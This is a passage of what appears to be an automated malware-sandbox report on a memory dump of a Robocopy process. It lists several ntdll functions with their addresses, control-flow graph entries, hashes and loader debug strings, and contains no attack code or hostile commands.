                                          • Opcode ID: eed337c32fb6f41eb36a5da2f2e381083d8929f4ae86bb7ae1fd5596f36d31d7
                                          • Instruction ID: 68c3c356fc61c607056862e35d2314b3d9e460da3f4c73fbeb22f7181c6ec82d
                                          • Opcode Fuzzy Hash: eed337c32fb6f41eb36a5da2f2e381083d8929f4ae86bb7ae1fd5596f36d31d7
                                          • Instruction Fuzzy Hash: 8490023120100403F500759855186C6004997E0345F51E815B5815555EC675D8957171
                                          Function 045A2B90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 145 45a2b90-45a2b9c LdrInitializeThunk
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.272502876792.0000000004530000.00000040.00001000.00020000.00000000.sdmp, Offset: 04530000, based on PE: true
                                          • Associated: 00000006.00000002.272502876792.0000000004659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.272502876792.000000000465D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_4530000_Robocopy.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: bbdeceb2c3ada53fd36048055bd4af20115a469180ac74bc851a3e6053d30179
                                          • Instruction ID: b815f859ec77fce73f64220a5fab8e5cffb418c35e8c11f3bec475e2f1370ee0
                                          • Opcode Fuzzy Hash: bbdeceb2c3ada53fd36048055bd4af20115a469180ac74bc851a3e6053d30179
                                          • Instruction Fuzzy Hash: 8A90023120108803F510715885147CA004997D0345F55DC15B4C15658DC6A5D8957161
                                          Function 045A2B80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 144 45a2b80-45a2b8c LdrInitializeThunk
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.272502876792.0000000004530000.00000040.00001000.00020000.00000000.sdmp, Offset: 04530000, based on PE: true
                                          • Associated: 00000006.00000002.272502876792.0000000004659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.272502876792.000000000465D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_4530000_Robocopy.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: b49e915629586a9767800bcd6a671ac6d070d1dc387498e3cdb2cc627ccba1d0
                                          • Instruction ID: 42c47da5c946b46d47ea873a2996245623ae9e51e4056ef77c813db44d18c717
                                          • Opcode Fuzzy Hash: b49e915629586a9767800bcd6a671ac6d070d1dc387498e3cdb2cc627ccba1d0
                                          • Instruction Fuzzy Hash: 3E90023120100843F50071584514BC6004997E0345F51D81AB0915654DC625D8557561
                                          Function 045A2B2A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 136 45a2b2a-45a2b2f 137 45a2b3f-45a2b46 LdrInitializeThunk 136->137 138 45a2b31-45a2b38 136->138
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.272502876792.0000000004530000.00000040.00001000.00020000.00000000.sdmp, Offset: 04530000, based on PE: true
                                          • Associated: 00000006.00000002.272502876792.0000000004659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.272502876792.000000000465D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_4530000_Robocopy.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 953419de0f2dad1a82371f7566b82c451b2be3ee9cfe0c9aa63a95aecd8fb996
                                          • Instruction ID: d45c7c3588cc97c6bb911966e6ce8d609940f00b0c175817d27c5328f22571bb
                                          • Opcode Fuzzy Hash: 953419de0f2dad1a82371f7566b82c451b2be3ee9cfe0c9aa63a95aecd8fb996
                                          • Instruction Fuzzy Hash: 0DB09B719014C5C7FB11EB60570875B794477D0745F15C455F1860691E4738D095F175

                                          Non-executed Functions

                                          Function 04597550 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                          Download Yara Rule
                                          Strings
                                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 045D4460
                                          • Execute=1, xrefs: 045D451E
                                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 045D454D
                                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 045D4592
                                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 045D4507
                                          • ExecuteOptions, xrefs: 045D44AB
                                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 045D4530
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.272502876792.0000000004530000.00000040.00001000.00020000.00000000.sdmp, Offset: 04530000, based on PE: true
                                          • Associated: 00000006.00000002.272502876792.0000000004659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.272502876792.000000000465D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_4530000_Robocopy.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                          • API String ID: 0-484625025
                                          • Opcode ID: 9438083d0e7b59eb6eaace40b03193c1cedba06cd6afa722d17e30cb20fb4c11
                                          • Instruction ID: 80a23b3cf9eb6e62037542411e01e09d319070cdbb71d314a5d378b846a23b62
                                          • Opcode Fuzzy Hash: 9438083d0e7b59eb6eaace40b03193c1cedba06cd6afa722d17e30cb20fb4c11
                                          • Instruction Fuzzy Hash: C651EC31610219BBEF64AE94EC59FAD73E8FF48304F0405AAD505A7181E770BE45EF54
                                          Function 04569046 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.272502876792.0000000004530000.00000040.00001000.00020000.00000000.sdmp, Offset: 04530000, based on PE: true
                                          • Associated: 00000006.00000002.272502876792.0000000004659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.272502876792.000000000465D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_4530000_Robocopy.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: $$@
                                          • API String ID: 0-1194432280
                                          • Opcode ID: 5b64a7f929511115d7d5296679c0fa5e2b7b50ff621036699738e708a52fb5de
                                          • Instruction ID: 5cd7b662b0f197889e4a1602e4b5d0e9c9d368a7791b2f26ecc1f819bcb98259
                                          • Opcode Fuzzy Hash: 5b64a7f929511115d7d5296679c0fa5e2b7b50ff621036699738e708a52fb5de
                                          • Instruction Fuzzy Hash: 1A810AB1D002699BDB31DB94CC44BEEB6B8BB44714F0041EAE909B7250E7706E84DFA1